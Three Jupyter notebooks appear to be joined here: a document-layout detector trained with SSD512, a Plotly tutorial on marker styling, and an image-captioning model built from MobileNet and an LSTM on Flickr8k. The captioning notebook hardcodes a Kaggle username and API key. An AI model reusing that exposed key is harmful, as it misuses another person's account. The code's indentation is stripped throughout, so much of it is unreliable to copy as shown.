A.IAAAdditiveGaussianNoise(),
A.ChannelShuffle(),
A.RandomBrightnessContrast(),
A.RGBShift(p=0.8),
A.HueSaturationValue(p=0.8)
], bbox_params=A.BboxParams(format='pascal_voc', min_visibility=0.2))
for i in range(1, 9):
label=""
transformed = transform(image=image, bboxes=boxes)
transformed_image = transformed['image']
transformed_bboxes = transformed['bboxes']
#print(transformed_bboxes)
flag=False
for box in transformed_bboxes:
x_min, y_min, x_max, y_max, class_name = box
            if(x_max <= x_min or y_max <= y_min):  # use the unpacked names, not the outer-loop globals
flag=True
break
label+= str(int(x_min))+' '+str(int(y_min))+' '+str(int(x_max))+' '+str(int(y_max))+' '+class_name+' '
if(flag):
continue
cv2.imwrite(final_root_dir+img_dir+str(i)+fname, transformed_image)
label=label[:-1]
combined.append([str(i) + fname, label])
```
# VOC to Monk Format Conversion
Applying data augmentation only on those images which contain at least 1 minority class, so as to reduce bias in the dataset
```
#label generation for csv
for i in tqdm(range(len(files))):
box=[];
augment=False;
annoFile = root_dir + anno_dir + files[i];
f = open(annoFile, 'r');
my_xml = f.read();
anno= dict(dict(dict(xmltodict.parse(my_xml))['PcGts'])['Page'])
fname=""
for j in range(len(files[i])):
if((files[i][j])>='0' and files[i][j]<='9'):
fname+=files[i][j];
fname+=".jpg"
image = cv2.imread(final_root_dir+img_dir+fname)
height, width = image.shape[:2]
label_str = ""
for key in anno.keys():
if(key=='@imageFilename' or key=='@imageWidth' or key=='@imageHeight'):
continue
if(key=="TextRegion"):
if(type(anno["TextRegion"]) == list):
for j in range(len(anno["TextRegion"])):
text=anno["TextRegion"][j]
xmin=width
ymin=height
xmax=0
ymax=0
if(text["Coords"]):
if(text["Coords"]["Point"]):
for k in range(len(text["Coords"]["Point"])):
coordinates=anno["TextRegion"][j]["Coords"]["Point"][k]
xmin= min(xmin, int(coordinates['@x']));
ymin= min(ymin, int(coordinates['@y']));
xmax= min(max(xmax, int(coordinates['@x'])), width);
ymax= min(max(ymax, int(coordinates['@y'])), height);
if('@type' in text.keys()):
label_str+= str(xmin)+' '+str(ymin)+' '+str(xmax)+' '+str(ymax)+' '+text['@type']+' '
if(xmax<=xmin or ymax<=ymin):
continue
tbox=[];
tbox.append(xmin)
tbox.append(ymin)
tbox.append(xmax)
tbox.append(ymax)
tbox.append(text['@type'])
box.append(tbox)
else:
text=anno["TextRegion"]
xmin=width
ymin=height
xmax=0
ymax=0
if(text["Coords"]):
if(text["Coords"]["Point"]):
for k in range(len(text["Coords"]["Point"])):
coordinates=anno["TextRegion"]["Coords"]["Point"][k]
xmin= min(xmin, int(coordinates['@x']));
ymin= min(ymin, int(coordinates['@y']));
xmax= min(max(xmax, int(coordinates['@x'])), width);
ymax= min(max(ymax, int(coordinates['@y'])), height);
if('@type' in text.keys()):
label_str+= str(xmin)+' '+str(ymin)+' '+str(xmax)+' '+str(ymax)+' '+text['@type']+' '
if(xmax<=xmin or ymax<=ymin):
continue
tbox=[];
tbox.append(xmin)
tbox.append(ymin)
tbox.append(xmax)
tbox.append(ymax)
tbox.append(text['@type'])
box.append(tbox)
else:
val=""
if(key=='GraphicRegion'):
val="graphics"
augment=True
elif(key=='ImageRegion'):
val="image"
elif(key=='NoiseRegion'):
val="noise"
augment=True
elif(key=='ChartRegion'):
val="chart"
augment=True
elif(key=='TableRegion'):
val="table"
augment=True
elif(key=='SeparatorRegion'):
val="separator"
elif(key=='MathsRegion'):
val="maths"
augment=True
elif(key=='LineDrawingRegion'):
val="linedrawing"
augment=True
else:
val="frame"
augment=True
if(type(anno[key]) == list):
for j in range(len(anno[key])):
text=anno[key][j]
xmin=width
ymin=height
xmax=0
ymax=0
if(text["Coords"]):
if(text["Coords"]["Point"]):
for k in range(len(text["Coords"]["Point"])):
coordinates=anno[key][j]["Coords"]["Point"][k]
xmin= min(xmin, int(coordinates['@x']));
ymin= min(ymin, int(coordinates['@y']));
xmax= min(max(xmax, int(coordinates['@x'])), width);
ymax= min(max(ymax, int(coordinates['@y'])), height);
label_str+= str(xmin)+' '+str(ymin)+' '+str(xmax)+' '+str(ymax)+' '+ val +' '
if(xmax<=xmin or ymax<=ymin):
continue
tbox=[];
tbox.append(xmin)
tbox.append(ymin)
tbox.append(xmax)
tbox.append(ymax)
tbox.append(val)
box.append(tbox)
else:
text=anno[key]
xmin=width
ymin=height
xmax=0
ymax=0
if(text["Coords"]):
if(text["Coords"]["Point"]):
for k in range(len(text["Coords"]["Point"])):
coordinates=anno[key]["Coords"]["Point"][k]
xmin= min(xmin, int(coordinates['@x']));
ymin= min(ymin, int(coordinates['@y']));
xmax= min(max(xmax, int(coordinates['@x'])), width);
ymax= min(max(ymax, int(coordinates['@y'])), height);
label_str+= str(xmin)+' '+str(ymin)+' '+str(xmax)+' '+str(ymax)+' '+val+' '
if(xmax<=xmin or ymax<=ymin):
continue
tbox=[];
tbox.append(xmin)
tbox.append(ymin)
tbox.append(xmax)
tbox.append(ymax)
tbox.append(val)
box.append(tbox)
label_str=label_str[:-1]
combined.append([fname, label_str])
if(augment):
augmentData(fname, box)
df = pd.DataFrame(combined, columns = ['ID', 'Label']);
df.to_csv(final_root_dir + "/train_labels.csv", index=False);
```
# Training
```
import os
import sys
sys.path.append("Monk_Object_Detection/1_gluoncv_finetune/lib/");
from detector_prototype import Detector
gtf = Detector();
root = "Document_Layout_Analysis/";
img_dir = "Images/";
anno_file = "train_labels.csv";
batch_size=8;
gtf.Dataset(root, img_dir, anno_file, batch_size=batch_size);
```
### Available models
ssd_300_vgg16_atrous_coco
ssd_300_vgg16_atrous_voc
ssd_512_vgg16_atrous_coco
ssd_512_vgg16_atrous_voc
ssd_512_resnet50_v1_coco
ssd_512_resnet50_v1_voc
ssd_512_mobilenet1.0_voc
ssd_512_mobilenet1.0_coco
yolo3_darknet53_voc
yolo3_darknet53_coco
yolo3_mobilenet1.0_voc
yolo3_mobilenet1.0_coco
```
#vgg16 architecture, with atrous convolutions, pretrained on COCO dataset is used for this task
pretrained = True;
gpu=True;
model_name = "ssd_512_vgg16_atrous_coco";
gtf.Model(model_name, use_pretrained=pretrained, use_gpu=gpu);
gtf.Set_Learning_Rate(0.003);
epochs=30;
params_file = "saved_model.params";
gtf.Train(epochs, params_file);
```
# Inference
```
import os
import sys
sys.path.append("Monk_Object_Detection/1_gluoncv_finetune/lib/");
from inference_prototype import Infer
model_name = "ssd_512_vgg16_atrous_coco";
params_file = "saved_model.params";
class_list = ["paragraph", "heading", "credit", "footer", "drop-capital", "floating", "noise", "maths", "header", "caption", "image", "linedrawing", "graphics", "fname", "page-number", "chart", "separator", "table"];
gtf = Infer(model_name, params_file, class_list, use_gpu=True);
img_name = "Test_Images/test1.jpg";
visualize = True;
thresh = 0.3;
output = gtf.run(img_name, visualize=visualize, thresh=thresh);
img_name = "Test_Images/test2.jpg";
visualize = True;
thresh = 0.3;
output = gtf.run(img_name, visualize=visualize, thresh=thresh);
img_name = "Test_Images/test3.jpg";
visualize = True;
thresh = 0.4;
output = gtf.run(img_name, visualize=visualize, thresh=thresh);
```
### Inference
SSD512 produces outputs with very high confidence, many of them above 0.9. It was also the only model able to identify footers and noise elements such as division lines in the document. However, it also produced repetitive or incorrect labels: ‘floating’ in the second example (an extra box with an incorrect label), and both ‘graphics’ and ‘paragraph’ in the third (two boxes with different labels for the same region).
If small details such as footers and separators are crucial for your work, and the focus is more on bounding-box prediction than on classification, go for SSD512. Note also that the gluoncv-finetune pipeline of Monk AI (used here for SSD512) provides architectures pre-trained on various other datasets, such as COCO.
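Duplicate or overlapping boxes like the ones noted above can often be reduced in post-processing with class-agnostic non-maximum suppression. The sketch below is not part of the Monk pipeline — it assumes boxes in `[x1, y1, x2, y2]` format and simply keeps the highest-scoring box while dropping any box whose IoU with it exceeds a threshold.

```python
import numpy as np

def iou(a, b):
    """Intersection-over-union of two [x1, y1, x2, y2] boxes."""
    x1, y1 = max(a[0], b[0]), max(a[1], b[1])
    x2, y2 = min(a[2], b[2]), min(a[3], b[3])
    inter = max(0, x2 - x1) * max(0, y2 - y1)
    area_a = (a[2] - a[0]) * (a[3] - a[1])
    area_b = (b[2] - b[0]) * (b[3] - b[1])
    return inter / (area_a + area_b - inter)

def nms(boxes, scores, iou_thresh=0.5):
    """Return indices of kept boxes, highest score first."""
    order = np.argsort(scores)[::-1]
    keep = []
    while len(order) > 0:
        best = order[0]
        keep.append(int(best))
        # Keep only the remaining boxes that do not overlap the best one too much
        order = np.array([i for i in order[1:]
                          if iou(boxes[best], boxes[i]) < iou_thresh])
    return keep

boxes = np.array([[0, 0, 100, 100], [5, 5, 100, 100], [200, 200, 300, 300]])
scores = np.array([0.9, 0.8, 0.7])
print(nms(boxes, scores))  # [0, 2] -- box 1 overlaps box 0 and is suppressed
```

Because it ignores class labels, this also collapses the "two boxes with different labels for the same region" case into a single detection.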
| github_jupyter |
#### New to Plotly?
Plotly's Python library is free and open source! [Get started](https://plot.ly/python/getting-started/) by downloading the client and [reading the primer](https://plot.ly/python/getting-started/).
<br>You can set up Plotly to work in [online](https://plot.ly/python/getting-started/#initialization-for-online-plotting) or [offline](https://plot.ly/python/getting-started/#initialization-for-offline-plotting) mode, or in [jupyter notebooks](https://plot.ly/python/getting-started/#start-plotting-online).
<br>We also have a quick-reference [cheatsheet](https://images.plot.ly/plotly-documentation/images/python_cheat_sheet.pdf) (new!) to help you get started!
#### Version Check
Plotly's python package is updated frequently. Run `pip install plotly --upgrade` to use the latest version.
```
import plotly
plotly.__version__
```
### Add Marker Border
In order to make markers distinct, you can add a border to the markers. This can be achieved by adding the line dict to the marker dict. For example, `marker:{..., line: {...}}`.
```
import plotly.plotly as py
import plotly.graph_objs as go
import numpy as np
x = np.random.uniform(low=3, high=6, size=(500,))
y = np.random.uniform(low=3, high=6, size=(500,))
data = [
go.Scatter(
mode = 'markers',
x = x,
y = y,
marker = dict(
color = 'rgb(17, 157, 255)',
size = 20,
line = dict(
color = 'rgb(231, 99, 250)',
width = 2
)
),
showlegend = False
),
go.Scatter(
mode = 'markers',
x = [2],
y = [4.5],
marker = dict(
color = 'rgb(17, 157, 255)',
size = 120,
line = dict(
color = 'rgb(231, 99, 250)',
width = 12
)
),
showlegend = False
)]
py.iplot(data, filename = "style-add-border")
```
### Fully Opaque
Fully opaque, the default setting, is useful for non-overlapping markers. When many points overlap it can be hard to observe density.
```
import plotly.plotly as py
import plotly.graph_objs as go
import numpy as np
x = np.random.uniform(low=3, high=6, size=(500,))
y = np.random.uniform(low=3, high=6, size=(500,))
data = [
go.Scatter(
mode = 'markers',
x = x,
y = y,
marker = dict(
color = 'rgb(17, 157, 255)',
size = 20,
line = dict(
color = 'rgb(231, 99, 250)',
width = 2
)
),
showlegend = False
),
go.Scatter(
mode = 'markers',
x = [2,2],
y = [4.25,4.75],
marker = dict(
color = 'rgb(17, 157, 255)',
size = 80,
line = dict(
color = 'rgb(231, 99, 250)',
width = 8
)
),
showlegend = False
)]
py.iplot(data, filename = "style-full-opaque")
```
### Opacity
Setting opacity outside the marker will set the opacity of the whole trace. This allows greater visibility of additional traces, but, as with full opacity, it remains hard to distinguish density.
```
import plotly.plotly as py
import plotly.graph_objs as go
import numpy as np
x = np.random.uniform(low=3, high=6, size=(500,))
y = np.random.uniform(low=3, high=4.5, size=(500,))
x2 = np.random.uniform(low=3, high=6, size=(500,))
y2 = np.random.uniform(low=4.5, high=6, size=(500,))
data = [
go.Scatter(
mode = 'markers',
x = x,
y = y,
opacity = 0.5,
marker = dict(
color = 'rgb(17, 157, 255)',
size = 20,
line = dict(
color = 'rgb(231, 99, 250)',
width = 2
)
),
name = 'Opacity 0.5'
),
go.Scatter(
mode = 'markers',
x = x2,
y = y2,
marker = dict(
color = 'rgb(17, 157, 255)',
size = 20,
line = dict(
color = 'rgb(231, 99, 250)',
width = 2
)
),
name = 'Opacity 1.0'
),
go.Scatter(
mode = 'markers',
x = [2,2],
y = [4.25,4.75],
opacity = 0.5,
marker = dict(
color = 'rgb(17, 157, 255)',
size = 80,
line = dict(
color = 'rgb(231, 99, 250)',
width = 8
)
),
showlegend = False
)]
py.iplot(data, filename = "style-opacity")
```
### Marker Opacity
To maximise visibility of density, it is recommended to set the opacity inside the marker: `marker:{opacity:0.5}`. If multiple traces exist with high density, consider using marker opacity in conjunction with trace opacity.
```
import plotly.plotly as py
import plotly.graph_objs as go
import numpy as np
x = np.random.uniform(low=3, high=6, size=(500,))
y = np.random.uniform(low=3, high=6, size=(500,))
data = [
go.Scatter(
mode = 'markers',
x = x,
y = y,
marker = dict(
color = 'rgb(17, 157, 255)',
size = 20,
opacity = 0.5,
line = dict(
color = 'rgb(231, 99, 250)',
width = 2
)
),
showlegend = False
),
go.Scatter(
mode = 'markers',
x = [2,2],
y = [4.25,4.75],
marker = dict(
color = 'rgb(17, 157, 255)',
size = 80,
opacity = 0.5,
line = dict(
color = 'rgb(231, 99, 250)',
width = 8
)
),
showlegend = False
)]
py.iplot(data, filename = "style-marker-opacity")
```
### Color Opacity
To maximise visibility of each point, set the color opacity by using alpha: `marker:{color: 'rgba(0,0,0,0.5)'}`. Here, the marker line will remain opaque.
```
import plotly.plotly as py
import plotly.graph_objs as go
import numpy as np
x = np.random.uniform(low=3, high=6, size=(500,))
y = np.random.uniform(low=3, high=6, size=(500,))
data = [
go.Scatter(
mode = 'markers',
x = x,
y = y,
marker = dict(
color = 'rgba(17, 157, 255, 0.5)',
size = 20,
line = dict(
color = 'rgb(231, 99, 250)',
width = 2
)
),
showlegend = False
),
go.Scatter(
mode = 'markers',
x = [2,2],
y = [4.25,4.75],
marker = dict(
color = 'rgba(17, 157, 255, 0.5)',
size = 80,
line = dict(
color = 'rgb(231, 99, 250)',
width = 8
)
),
showlegend = False
)]
py.iplot(data, filename = "style-color-opacity")
```
### Reference
See https://plot.ly/python/reference/ for more information and chart attribute options!
```
from IPython.display import display, HTML
display(HTML('<link href="//fonts.googleapis.com/css?family=Open+Sans:600,400,300,200|Inconsolata|Ubuntu+Mono:400,700" rel="stylesheet" type="text/css" />'))
display(HTML('<link rel="stylesheet" type="text/css" href="http://help.plot.ly/documentation/all_static/css/ipython-notebook-custom.css">'))
! pip install git+https://github.com/plotly/publisher.git --upgrade
import publisher
publisher.publish(
'marker-style.ipynb', 'python/marker-style/', 'Styling Markers',
'How to style markers in Python with Plotly.',
title = 'Styling Markers | Plotly',
has_thumbnail='false', thumbnail='thumbnail/marker-style.gif',
language='python',
page_type='example_index',
display_as='style_opt', order=8, ipynb='~notebook_demo/203')
```
| github_jupyter |
<a href="https://colab.research.google.com/github/fahmij8/Bangkit-Final-Project/blob/master/Mobile_Net_LSTM.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
import os
os.environ['KAGGLE_USERNAME'] = 'aflita'
os.environ['KAGGLE_KEY'] = 'cad9302366db38692e6dfc19fee87783'
# Mount Drive
from google.colab import drive
drive.mount('/content/gdrive')
import tensorflow as tf
import numpy as np
import pickle
import os
from keras.preprocessing.image import load_img
from keras.preprocessing.image import img_to_array
import numpy as np
import pickle
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from IPython.display import Image, display
from tqdm import tqdm
from keras.preprocessing import image
#from keras.models import Model
!kaggle datasets download -d shadabhussain/flickr8k
!kaggle datasets download -d rtatman/glove-global-vectors-for-word-representation
!unzip -q flickr8k.zip -d .
!unzip -q glove-global-vectors-for-word-representation.zip -d .
# Read Image Folder
image_folder = '/content/Flickr_Data/Flickr_Data/Images/'
# Read Annotation Folder
annotation_file = '/content/Flickr_Data/Flickr_Data/Flickr_TextData/Flickr8k.token.txt'
# Read Training File
train_file = '/content/Flickr_Data/Flickr_Data/Flickr_TextData/Flickr_8k.trainImages.txt'
# Read Validation File
val_file = '/content/Flickr_Data/Flickr_Data/Flickr_TextData/Flickr_8k.devImages.txt'
# Read Test File
test_file = '/content/Flickr_Data/Flickr_Data/Flickr_TextData/Flickr_8k.testImages.txt'
# Read GloVe File
glove_file ='/content/glove.6B.50d.txt'
unique_train = open(train_file, 'r').read().splitlines()
unique_val = open(val_file, 'r').read().splitlines()
unique_test = open(test_file, 'r').read().splitlines()
annotations = open(annotation_file,'r').read().splitlines()
# Collect Dataset
import re
def collect_list(unique_set):
data = []
for idx, el in enumerate(annotations):
# Split Image ID with Captions
fname, cap = re.split("#[0-9][\t]", el)
cap = cap.split()
cap = [w for w in cap if len(w)>1]
cap = ' '.join(cap)
cap = '<start> ' + cap + ' <end>'
cap = cap.lower()
if fname in unique_set:
data.append([fname,cap])
return data
train_set = collect_list(unique_train)
val_set = collect_list(unique_val)
test_set = collect_list(unique_test)
print('Collected Train Sets: %d' %len(train_set))
print('Collected Val Sets: %d' %len(val_set))
print('Collected Test Sets: %d' %len(test_set))
print('\n')
print('Unique Train Sets: %d' %len(unique_train))
print('Unique Val Sets: %d' %len(unique_val))
print('Unique Test Sets: %d' %len(unique_test))
```
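The caption cleaning inside `collect_list` can be checked on a single sample annotation line (the filename and caption below are made up for illustration):

```python
import re

line = "12345.jpg#0\tA child is playing in the park ."
# Split the image ID from the caption on the '#<digit><tab>' marker
fname, cap = re.split(r"#[0-9]\t", line)
# Drop one-character tokens (e.g. 'A', '.'), lowercase, add boundary tokens
words = [w for w in cap.split() if len(w) > 1]
cap = '<start> ' + ' '.join(words).lower() + ' <end>'
print(fname)  # 12345.jpg
print(cap)    # <start> child is playing in the park <end>
```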
**Define Model**
```
# Optional
# Define Baseline CNN Model
from tensorflow import keras
baseline_model = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(64, (3,3), activation= 'relu', input_shape = (224, 224, 3)),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(64, (3,3), activation= 'relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(128, (3,3), activation = 'relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(128, (3,3), activation = 'relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(64, (3,3), activation = 'relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(512, activation = 'relu'),
tf.keras.layers.Dense(512, activation = 'softmax')
])
baseline_model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
#baseline_model.summary()
baseline = tf.keras.Model(inputs = baseline_model.input,
outputs = baseline_model.layers[-3].output)
baseline.summary()
# Transfer Learning MobileNet
from keras.applications.mobilenet import MobileNet
from keras.models import Model, Sequential
mobilenet = tf.keras.applications.MobileNet(weights='imagenet',include_top = True, input_shape = (224,224,3))
img_model = tf.keras.Model(inputs = mobilenet.input,
outputs = mobilenet.layers[-3].output)
x = tf.keras.layers.Flatten()(mobilenet.output)
img_model = tf.keras.Model(inputs = mobilenet.input, outputs = x)
img_model.summary()
```
Preprocess Image Model
```
def preprocess_input(x):
x /= 127.5
x -= 1
return x
def preprocess(image_path):
img = image.load_img(image_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
return x
def encode(image):
image = preprocess(image)
temp_enc = img_model.predict(image)
temp_enc = np.reshape(temp_enc, 1000)
return temp_enc
# Extract Image Features
train_features = {}
for img in tqdm(unique_train):
path = os.path.join(image_folder, img)
train_features[img] = encode(path)
val_features = {}
for img in tqdm(unique_val):
path = os.path.join(image_folder, img)
val_features[img] = encode(path)
train_features['3556792157_d09d42bef7.jpg'].shape, print(len(train_features)), print(len(val_features))
# Save Feature
pickle.dump(train_features, open('train_features.pkl','wb'))
pickle.dump(val_features, open('val_features.pkl','wb'))
# Load Features if Available
train_features = pickle.load(open('/content/train_features.pkl', 'rb'))
val_features = pickle.load(open('/content/val_features.pkl', 'rb'))
```
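The `preprocess_input` helper above rescales pixel values from [0, 255] to [-1, 1], which is the input range MobileNet expects. A quick standalone check:

```python
import numpy as np

def preprocess_input(x):
    x /= 127.5
    x -= 1
    return x

pixels = np.array([0.0, 127.5, 255.0])
result = preprocess_input(pixels)
print(result)  # [-1.  0.  1.]
```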
**Preprocess Captions**
```
train_captions = [train[1] for train in train_set]
val_captions = [val[1] for val in val_set]
# Token
num_words = 7380
oov = '<unk>'
filt = '!"#$%&()*+.,-/:;=?@[\]^_`{|}~ '
tokenizer = Tokenizer(num_words+1, oov_token = oov, filters = filt)
tokenizer.fit_on_texts(train_captions)
word2index = tokenizer.word_index
vocab_size = len(word2index) + 1
print('Reduced Vocabulary Size: %d' % vocab_size)
max_length = max(len(train_set[i][1].split()) for i in range(len(train_set)))
print('Description Length: %d' % max_length)
# Reverse Index to Word
index2word = dict([(value, key) for (key, value) in word2index.items()])
word2index['<start>']
# Fit Token to Texts
train_seq = tokenizer.texts_to_sequences(train_captions)
val_seq = tokenizer.texts_to_sequences(val_captions)
# Store Sequences
def create_sequence(sequence_name):
padded_sequences, subsequent_words = [], []
for seq in sequence_name:
partial_seqs = []
next_words = []
for i in range(1, len(seq)):
partial_seqs.append(seq[:i])
next_words.append(seq[i])
padded_partial_seqs = pad_sequences(partial_seqs, max_length, padding='post')
next_words_1hot = np.zeros([len(next_words), vocab_size], dtype=bool)  # np.bool is deprecated; use the builtin bool
#Vectorization
for i,next_word in enumerate(next_words):
next_words_1hot[i, next_word] = 1
padded_sequences.append(padded_partial_seqs)
subsequent_words.append(next_words_1hot)
padded_sequences = np.asarray(padded_sequences)
subsequent_words = np.asarray(subsequent_words)
return padded_sequences, subsequent_words
padded_sequences, subsequent_words = create_sequence(train_seq)
vpadded_sequences, vsubsequent_words = create_sequence(val_seq)
print(padded_sequences.shape)
print(subsequent_words.shape)
print(vpadded_sequences.shape)
print(vsubsequent_words.shape)
num_of_images = 6000
captions = np.zeros([0, max_length])
next_words = np.zeros([0, vocab_size])
# Store Captions and Next Words to Disk
for i in tqdm(range(num_of_images)):
captions = np.concatenate([captions, padded_sequences[i]])
next_words = np.concatenate([next_words, subsequent_words[i]])
np.save("captions.npy", captions)
np.save("next_words.npy", next_words)
print(captions.shape)
print(next_words.shape)
# Get Images Array
imgs = []
for i in range(len(train_set)):
if train_set[i][0] in train_features.keys():
imgs.append(list(train_features[train_set[i][0]]))
imgs = np.asarray(imgs)
images = []
for ix in range(6000):#num_of_images
for iy in range(padded_sequences[ix].shape[0]):
images.append(imgs[ix])
images = np.asarray(images)
np.save("images.npy", images)
print(images.shape)
vcaptions = np.zeros([0, max_length])
vnext_words = np.zeros([0, vocab_size])
# Store Captions and Next Words to Disk
for i in tqdm(range(1000)): #1000 Validation Set
vcaptions = np.concatenate([vcaptions, vpadded_sequences[i]])
vnext_words = np.concatenate([vnext_words, vsubsequent_words[i]])
np.save("vcaptions.npy", vcaptions)
np.save("vnext_words.npy", vnext_words)
print(vcaptions.shape)
print(vnext_words.shape)
imgs = []
for i in range(len(val_set)):
if val_set[i][0] in val_features.keys():
imgs.append(list(val_features[val_set[i][0]]))
imgs = np.asarray(imgs)
#print(imgs.shape)
images = []
for ix in range(1000):#num_of_images
for iy in range(vpadded_sequences[ix].shape[0]):
images.append(imgs[ix])
images = np.asarray(images)
np.save("vimages.npy", images)
print(images.shape)
!cp -r /content/next_words.npy '/content/gdrive/My Drive/'
!cp -r /content/captions.npy '/content/gdrive/My Drive/'
```
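`create_sequence` above expands each caption into (partial sequence, next word) training pairs. The toy example below reproduces that expansion in plain Python, post-padding to a fixed length as `pad_sequences(..., padding='post')` does (the token indices are made up):

```python
seq = [1, 7, 9, 2]   # e.g. <start> a dog <end>
max_length = 5

pairs = []
for i in range(1, len(seq)):
    partial = seq[:i] + [0] * (max_length - i)   # post-padded partial sequence
    pairs.append((partial, seq[i]))              # (input, next word to predict)

for partial, nxt in pairs:
    print(partial, '->', nxt)
# [1, 0, 0, 0, 0] -> 7
# [1, 7, 0, 0, 0] -> 9
# [1, 7, 9, 0, 0] -> 2
```

This is why the arrays grow so quickly: a caption of length L contributes L-1 training rows.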
**Model**
```
import numpy as np
captions = np.load("captions.npy")
next_words = np.load("next_words.npy")
images = np.load("images.npy")
print(captions.shape)
print(next_words.shape)
print(images.shape)
vcaptions = np.load("vcaptions.npy")
vnext_words = np.load("vnext_words.npy")
vimages = np.load("vimages.npy")
print(vcaptions.shape)
print(vnext_words.shape)
print(vimages.shape)
# Adding GloVe Vector
embeddings = {}
f = open(glove_file, encoding='utf8')
for line in f:
words = line.split()
word_embeddings = np.array(words[1:], dtype='float')
embeddings[words[0]] = word_embeddings
f.close()
len(embeddings)
embedding_matrix = np.zeros((len(word2index) + 1, 50)) #50
for word, index in word2index.items():
embedding_vector = embeddings.get(word)
if embedding_vector is not None:
embedding_matrix[index] = embedding_vector
print(embedding_matrix.shape)
```
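Each row of `embedding_matrix` above holds the pretrained GloVe vector for the corresponding tokenizer index; words without a pretrained vector, and the padding row 0, stay all-zero. A toy version with a made-up two-word vocabulary and 3-dimensional vectors:

```python
import numpy as np

# Hypothetical miniature "GloVe" mapping, for illustration only
embeddings = {'dog': np.array([0.1, 0.2, 0.3]),
              'cat': np.array([0.4, 0.5, 0.6])}
word2index = {'dog': 1, 'cat': 2, '<unk>': 3}

embedding_matrix = np.zeros((len(word2index) + 1, 3))
for word, index in word2index.items():
    vec = embeddings.get(word)
    if vec is not None:
        embedding_matrix[index] = vec

print(embedding_matrix)
# row 0 (padding) and row 3 ('<unk>') remain zero
```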
Model LSTM
```
from keras.layers.merge import add
from keras.layers import Input
from keras.utils import plot_model
from keras.layers import LSTM, Embedding, TimeDistributed, Dense, RepeatVector, Activation, Flatten, Reshape
from keras.layers import Dropout
from keras.models import Model
from keras.layers import concatenate, Concatenate
from keras.layers.wrappers import Bidirectional
embedding_size = 50
max_len = max_length
# Image Model
image_inp = Input(shape=(1000,))
image_model = Dense(embedding_size,input_shape=(1000,),activation='relu')(image_inp)
image_model = RepeatVector(max_len)(image_model)
# Caption Model
caption_inp = Input(shape=(max_len,))
caption_model = Embedding(vocab_size, embedding_size, input_length=max_len)(caption_inp)
caption_model = LSTM(256,return_sequences=True)(caption_model) #123
caption_model = TimeDistributed(Dense(50))(caption_model)
# Decoder model
merge_model = Concatenate(axis=1)([image_model, caption_model])
merge_model = Bidirectional(LSTM(256, return_sequences=False))(merge_model) #128
merge_model = Dense(vocab_size)(merge_model)
merge_model = Activation('softmax')(merge_model)
# Tie it together [image, seq] [word]
lang_model = Model(inputs=[image_inp,caption_inp],outputs=merge_model)
lang_model.layers[2].set_weights([embedding_matrix])
lang_model.layers[2].trainable = False
lang_model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
lang_model.summary()
from keras.utils import plot_model
plot_model(lang_model, to_file='model.png', show_shapes=True)
from keras.callbacks import ModelCheckpoint
# define checkpoint callback
filepath = 'model-ep{epoch:03d}-loss{loss:.3f}-val_loss{val_loss:.3f}.h5'
checkpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, mode='min')
hist = lang_model.fit([images, captions], next_words, batch_size=600, epochs=20, callbacks=[checkpoint], validation_data=([vimages, vcaptions], vnext_words))
import matplotlib.pyplot as plt
# summarize history for accuracy
plt.plot(hist.history['accuracy'])
plt.plot(hist.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
# summarize history for loss
plt.plot(hist.history['loss'])
plt.plot(hist.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
img_model.save('img_model_1000.h5')
lang_model.save('lang_model_1000.h5')
!pip install tensorflowjs
!mkdir model1000
import tensorflowjs as tfjs
tfjs.converters.save_keras_model(img_model, 'model1000/img_model')
tfjs.converters.save_keras_model(lang_model, 'model1000/lang_model')
!cp -r /content/model1000 '/content/gdrive/My Drive'
!cp -r /content/img_model_1000.h5 '/content/gdrive/My Drive'
!cp -r /content/lang_model_1000.h5 '/content/gdrive/My Drive'
```
Predict
```
from nltk.translate.bleu_score import sentence_bleu
from nltk.translate.bleu_score import SmoothingFunction
import random
from tensorflow.keras.preprocessing.sequence import pad_sequences
from keras.preprocessing import image
def preprocess_input(x):
x /= 127.5
x -= 1
return x
def preprocess(image_path):
img = load_img(image_path, target_size=(224, 224))
x = img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
return x
def encode(image):
image = preprocess(image)
temp_enc = img_model.predict(image)
temp_enc = np.reshape(temp_enc, 1000)
return temp_enc
def predict_captions(image):
start_word = ["<start>"]
while True:
par_caps = [word2index[i] for i in start_word]
par_caps = pad_sequences([par_caps], maxlen=max_len, padding='post')
#e = encoding_test[image[len(images):]]
e = encode(image)
preds = lang_model.predict([np.array([e]), np.array(par_caps)])
word_pred = index2word[np.argmax(preds[0])]
start_word.append(word_pred)
if word_pred == "<end>" or len(start_word) > max_len:
break
return ' '.join(start_word[1:-1])
#Mean bleu
max_length = 34
bleus = []
for t in unique_val:
test_img_path = os.path.join(image_folder, t)
real_cap = next(y for x,y in val_set if x==t)
#image = preprocess_image(test_img_path)
#feature = img_model.predict(image)
#feature = np.reshape(feature, feature.shape[1])
Argmax_Search = predict_captions(test_img_path)
pic = Image(filename=test_img_path)
#display(pic)
s_real = real_cap.split()
s_real = s_real[1: -1]
s_pred = Argmax_Search.split()
bleu = sentence_bleu([s_real], s_pred)
#print('Real Captions: {}'.format(''.join(real_cap)))
#print('Predicted Captions: {}'.format(Argmax_Search))
#print('BLEU: {}'.format(bleu))
#print('\n')
bleus.append(bleu)
print("Mean BLEU {}".format(np.mean(bleus)))
```
